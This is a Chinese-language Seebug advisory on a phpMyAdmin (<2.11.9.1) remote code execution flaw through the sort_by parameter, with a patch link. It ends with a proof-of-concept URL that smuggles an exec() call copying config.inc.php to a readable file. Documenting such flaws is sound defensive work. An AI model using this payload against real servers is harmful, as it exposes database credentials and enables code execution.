phpMyAdmin sort_by参数远程代码执行漏洞

2008-09-18T00:00:00
ID SSV:4065
Type seebug
Reporter Root
Modified 2008-09-18T00:00:00

Description

BUGTRAQ ID: 31188

phpMyAdmin是用PHP编写的工具,用于通过WEB管理MySQL。

phpMyAdmin的server_databases.php脚本没有正确地过滤对sort_by参数的输入,远程攻击者可以通过提交恶意请求注入并执行任意PHP代码。

phpMyAdmin < 2.11.9.1 phpMyAdmin


目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

<a href=http://cache.gmane.org//gmane/comp/security/oss/general/947-001.bin target=_blank>http://cache.gmane.org//gmane/comp/security/oss/general/947-001.bin</a>

                                        
                                            
                                                http://www.example.com/server_databases.php?pos=0&amp;dbstats=0&amp;sort_by=&quot;]) OR exec('cp $(pwd)&quot;/config.inc.php&quot; config.txt'); //&amp;sort_order=desc&amp;token=[valid token]